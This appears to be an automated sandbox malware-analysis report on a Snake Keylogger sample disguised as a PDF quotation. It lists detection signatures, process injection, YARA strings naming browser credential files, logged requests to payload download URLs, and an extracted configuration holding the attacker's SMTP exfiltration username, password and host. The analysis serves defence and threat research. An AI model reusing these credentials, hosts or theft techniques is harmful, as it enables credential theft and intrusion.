Edit tour

Windows Analysis Report
QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Overview

General Information

Sample name:	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe renamed because original name is a hash value
Original sample name:	QUOTATION_NOVQTRA071244PDF.scr.exe
Analysis ID:	1557528
MD5:	9c6de69b3f4bd16dc76a37fd8a50aea4
SHA1:	a5c6f87a637a6e5ffd073dc90a3cbfa0591160c1
SHA256:	137ad88b1c43f6aa6f01b9b8a7b15027387d501dbe7af463a7b639f5abf3f116
Tags:	exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Yara detected Snake Keylogger

.NET source code contains potential unpacker

AI detected suspicious sample

Creates a thread in another existing process (thread injection)

Initial sample is a PE file and has a suspicious name

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file does not import any functions

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: AspNetCompiler Execution

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w10x64

QUOTATION_NOVQTRA071244#U00faPDF.scr.exe (PID: 828 cmdline: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe" MD5: 9C6DE69B3F4BD16DC76A37FD8A50AEA4)

aspnet_compiler.exe (PID: 2928 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe" MD5: DF5419B32657D2896514B6A1D041FE08)

conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD@N*]*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2632327224.0000021FBBEA0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.3366738484.00000258936F0000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x21508:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x24a3e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.3368058853.000002589568D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1439b:$a1: get_encryptedPassword 0x1467f:$a2: get_encryptedUsername 0x141a7:$a3: get_timePasswordChanged 0x142a2:$a4: get_passwordField 0x143b1:$a5: set_encryptedPassword 0x15986:$a7: get_logins 0x158e9:$a10: KeyLoggerEventArgs 0x15582:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bc95:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1aec7:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b2fa:$a4: \Orbitum\User Data\Default\Login Data 0x1c339:$a5: \Kometa\User Data\Default\Login Data
00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14f1a:$s1: UnHook 0x14f21:$s2: SetHook 0x14f29:$s3: CallNextHook 0x14f36:$s4: _hook
00000004.00000002.3367707682.0000025893A30000.00000004.08000000.00040000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c6c:$x1: $%SMTPDV$ 0x17cd2:$x2: $#TheHashHere%& 0x192af:$x3: %FTPDV$ 0x19399:$x4: $%TelegramDv$ 0x15582:$x5: KeyLoggerEventArgs 0x158e9:$x5: KeyLoggerEventArgs 0x192d3:$m2: Clipboard Logs ID 0x194e9:$m2: Screenshot Logs ID 0x195f9:$m2: keystroke Logs ID 0x198d3:$m3: SnakePW 0x194c1:$m4: \SnakeKeylogger\
00000000.00000002.2622093932.0000021FA370A000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x19f0:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x4f26:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b483:$a1: get_encryptedPassword 0x1b767:$a2: get_encryptedUsername 0x1b28f:$a3: get_timePasswordChanged 0x1b38a:$a4: get_passwordField 0x1b499:$a5: set_encryptedPassword 0x1ca6e:$a7: get_logins 0x1c9d1:$a10: KeyLoggerEventArgs 0x1c66a:$a11: KeyLoggerEventArgsEventHandler
00000004.00000002.3371390790.00000258A5449000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x1ed54:$x1: $%SMTPDV$ 0x1edba:$x2: $#TheHashHere%& 0x20397:$x3: %FTPDV$ 0x20481:$x4: $%TelegramDv$ 0x1c66a:$x5: KeyLoggerEventArgs 0x1c9d1:$x5: KeyLoggerEventArgs 0x203bb:$m2: Clipboard Logs ID 0x205d1:$m2: Screenshot Logs ID 0x206e1:$m2: keystroke Logs ID 0x209bb:$m3: SnakePW 0x205a9:$m4: \SnakeKeylogger\
00000000.00000002.2622093932.0000021FA348E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x955f8:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x98b2e:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Process Memory Space: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe PID: 828	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe PID: 828	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 2928	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
Process Memory Space: aspnet_compiler.exe PID: 2928	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x4552e:$a1: get_encryptedPassword 0x51fcb:$a1: get_encryptedPassword 0x45808:$a2: get_encryptedUsername 0x522a5:$a2: get_encryptedUsername 0x45344:$a3: get_timePasswordChanged 0x51de1:$a3: get_timePasswordChanged 0x4543f:$a4: get_passwordField 0x51edc:$a4: get_passwordField 0x45544:$a5: set_encryptedPassword 0x51fe1:$a5: set_encryptedPassword 0x47931:$a7: get_logins 0x543ce:$a7: get_logins 0x47894:$a10: KeyLoggerEventArgs 0x54331:$a10: KeyLoggerEventArgs 0x4752d:$a11: KeyLoggerEventArgsEventHandler 0x53fca:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: aspnet_compiler.exe PID: 2928	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x4752d:$x5: KeyLoggerEventArgs 0x47894:$x5: KeyLoggerEventArgs 0x48182:$x5: KeyLoggerEventArgs 0x484b6:$x5: KeyLoggerEventArgs 0x53fca:$x5: KeyLoggerEventArgs 0x54331:$x5: KeyLoggerEventArgs 0x54c1f:$x5: KeyLoggerEventArgs 0x54f53:$x5: KeyLoggerEventArgs 0x49a57:$m2: Clipboard Logs ID 0x49b49:$m2: Screenshot Logs ID 0x49b9f:$m2: keystroke Logs ID 0x564f4:$m2: Clipboard Logs ID 0x565e6:$m2: Screenshot Logs ID 0x5663c:$m2: keystroke Logs ID 0x49cd4:$m3: SnakePW 0x56771:$m3: SnakePW 0x49b35:$m4: \SnakeKeylogger\ 0x565d2:$m4: \SnakeKeylogger\
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1439b:$a1: get_encryptedPassword 0x1467f:$a2: get_encryptedUsername 0x141a7:$a3: get_timePasswordChanged 0x142a2:$a4: get_passwordField 0x143b1:$a5: set_encryptedPassword 0x15986:$a7: get_logins 0x158e9:$a10: KeyLoggerEventArgs 0x15582:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bc95:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1aec7:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b2fa:$a4: \Orbitum\User Data\Default\Login Data 0x1c339:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14f1a:$s1: UnHook 0x14f21:$s2: SetHook 0x14f29:$s3: CallNextHook 0x14f36:$s4: _hook
4.2.aspnet_compiler.exe.25893a30000.0.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c6c:$x1: $%SMTPDV$ 0x17cd2:$x2: $#TheHashHere%& 0x192af:$x3: %FTPDV$ 0x19399:$x4: $%TelegramDv$ 0x15582:$x5: KeyLoggerEventArgs 0x158e9:$x5: KeyLoggerEventArgs 0x192d3:$m2: Clipboard Logs ID 0x194e9:$m2: Screenshot Logs ID 0x195f9:$m2: keystroke Logs ID 0x198d3:$m3: SnakePW 0x194c1:$m4: \SnakeKeylogger\
0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fbbea0000.9.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
4.2.aspnet_compiler.exe.25893a30000.0.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.25893a30000.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1259b:$a1: get_encryptedPassword 0x1287f:$a2: get_encryptedUsername 0x123a7:$a3: get_timePasswordChanged 0x124a2:$a4: get_passwordField 0x125b1:$a5: set_encryptedPassword 0x13b86:$a7: get_logins 0x13ae9:$a10: KeyLoggerEventArgs 0x13782:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.25893a30000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19e95:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x190c7:$a3: \Google\Chrome\User Data\Default\Login Data 0x194fa:$a4: \Orbitum\User Data\Default\Login Data 0x1a539:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.25893a30000.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1311a:$s1: UnHook 0x13121:$s2: SetHook 0x13129:$s3: CallNextHook 0x13136:$s4: _hook
4.2.aspnet_compiler.exe.25893a30000.0.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15e6c:$x1: $%SMTPDV$ 0x15ed2:$x2: $#TheHashHere%& 0x174af:$x3: %FTPDV$ 0x17599:$x4: $%TelegramDv$ 0x13782:$x5: KeyLoggerEventArgs 0x13ae9:$x5: KeyLoggerEventArgs 0x174d3:$m2: Clipboard Logs ID 0x176e9:$m2: Screenshot Logs ID 0x177f9:$m2: keystroke Logs ID 0x17ad3:$m3: SnakePW 0x176c1:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.258a54500e8.1.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.258a54500e8.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1259b:$a1: get_encryptedPassword 0x1287f:$a2: get_encryptedUsername 0x123a7:$a3: get_timePasswordChanged 0x124a2:$a4: get_passwordField 0x125b1:$a5: set_encryptedPassword 0x13b86:$a7: get_logins 0x13ae9:$a10: KeyLoggerEventArgs 0x13782:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.258a54500e8.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x19e95:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x190c7:$a3: \Google\Chrome\User Data\Default\Login Data 0x194fa:$a4: \Orbitum\User Data\Default\Login Data 0x1a539:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.258a54500e8.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x1311a:$s1: UnHook 0x13121:$s2: SetHook 0x13129:$s3: CallNextHook 0x13136:$s4: _hook
4.2.aspnet_compiler.exe.258a54500e8.1.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x15e6c:$x1: $%SMTPDV$ 0x15ed2:$x2: $#TheHashHere%& 0x174af:$x3: %FTPDV$ 0x17599:$x4: $%TelegramDv$ 0x13782:$x5: KeyLoggerEventArgs 0x13ae9:$x5: KeyLoggerEventArgs 0x174d3:$m2: Clipboard Logs ID 0x176e9:$m2: Screenshot Logs ID 0x177f9:$m2: keystroke Logs ID 0x17ad3:$m3: SnakePW 0x176c1:$m4: \SnakeKeylogger\
4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1439b:$a1: get_encryptedPassword 0x1467f:$a2: get_encryptedUsername 0x141a7:$a3: get_timePasswordChanged 0x142a2:$a4: get_passwordField 0x143b1:$a5: set_encryptedPassword 0x15986:$a7: get_logins 0x158e9:$a10: KeyLoggerEventArgs 0x15582:$a11: KeyLoggerEventArgsEventHandler
4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x1bc95:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x1aec7:$a3: \Google\Chrome\User Data\Default\Login Data 0x1b2fa:$a4: \Orbitum\User Data\Default\Login Data 0x1c339:$a5: \Kometa\User Data\Default\Login Data
4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x14f1a:$s1: UnHook 0x14f21:$s2: SetHook 0x14f29:$s3: CallNextHook 0x14f36:$s4: _hook
4.2.aspnet_compiler.exe.258a54500e8.1.raw.unpack	MALWARE_Win_SnakeKeylogger	Detects Snake Keylogger	ditekSHen	0x17c6c:$x1: $%SMTPDV$ 0x17cd2:$x2: $#TheHashHere%& 0x192af:$x3: %FTPDV$ 0x19399:$x4: $%TelegramDv$ 0x15582:$x5: KeyLoggerEventArgs 0x158e9:$x5: KeyLoggerEventArgs 0x192d3:$m2: Clipboard Logs ID 0x194e9:$m2: Screenshot Logs ID 0x195f9:$m2: keystroke Logs ID 0x198d3:$m3: SnakePW 0x194c1:$m4: \SnakeKeylogger\
0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb3538a70.2.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0.2.QUOTATION_NOVQTRA071244#U00faPDF.scr.exe.21fb33cf5f8.7.raw.unpack	Windows_Trojan_Donutloader_f40e3759	unknown	unknown	0x95000:$x64: 06 B8 03 40 00 80 C3 4C 8B 49 10 49 0x98536:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
Click to see the 19 entries

Sigma Signatures

System Summary

Sigma detected: AspNetCompiler Execution

Source: Process started

Author: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe", ParentImage: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, ParentProcessId: 828, ParentProcessName: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe", ProcessId: 2928, ProcessName: aspnet_compiler.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T11:45:59.449929+0100	2803305	3	Unknown Traffic	192.168.2.5	49950	188.114.96.3	443	TCP
2024-11-18T11:46:02.300860+0100	2803305	3	Unknown Traffic	192.168.2.5	49970	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-18T11:45:57.617740+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49936	132.226.247.73	80	TCP
2024-11-18T11:45:58.727134+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49936	132.226.247.73	80	TCP
2024-11-18T11:46:01.602260+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49955	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000004.00000002.3368058853.0000025895441000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "abbsend@qlststv.com", "Password": "G!!HFpD@N*]*nF", "Host": "gator3220.hostgator.com", "Port": "587", "Version": "5.1"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49942 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49706 version: TLS 1.2

Source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB337F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632987670.0000021FBC1A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3639000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB337F000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632987670.0000021FBC1A0000.00000004.08000000.00040000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2622093932.0000021FA3639000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB35FE000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2629438942.0000021FB33CF000.00000004.00000800.00020000.00000000.sdmp, QUOTATION_NOVQTRA071244#U00faPDF.scr.exe, 00000000.00000002.2632586012.0000021FBBF20000.00000004.08000000.00040000.00000000.sdmp

Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 4x nop then jmp 00007FF84909D66Bh	0_2_00007FF84909D3C2
Source: C:\Users\user\Desktop\QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Code function: 4x nop then jmp 00007FF84909D66Bh	0_2_00007FF84909D3C2
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848F3A235h	4_2_00007FF848F39E4D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848F39C1Bh	4_2_00007FF848F3994B
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848F3A235h	4_2_00007FF848F3A151
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848F39C1Bh	4_2_00007FF848F39D54
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Code function: 4x nop then jmp 00007FF848F37470h	4_2_00007FF848F37419

Source: global traffic	HTTP traffic detected: GET /data-package/zWkbOqX7/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /storage/download/BbYQU8RBGGG7 HTTP/1.1Host: s24.filetransfer.ioConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/155.94.241.187 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /data-package/zWkbOqX7/download HTTP/1.1Host: filetransfer.ioConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49936 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49955 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49970 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49950 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
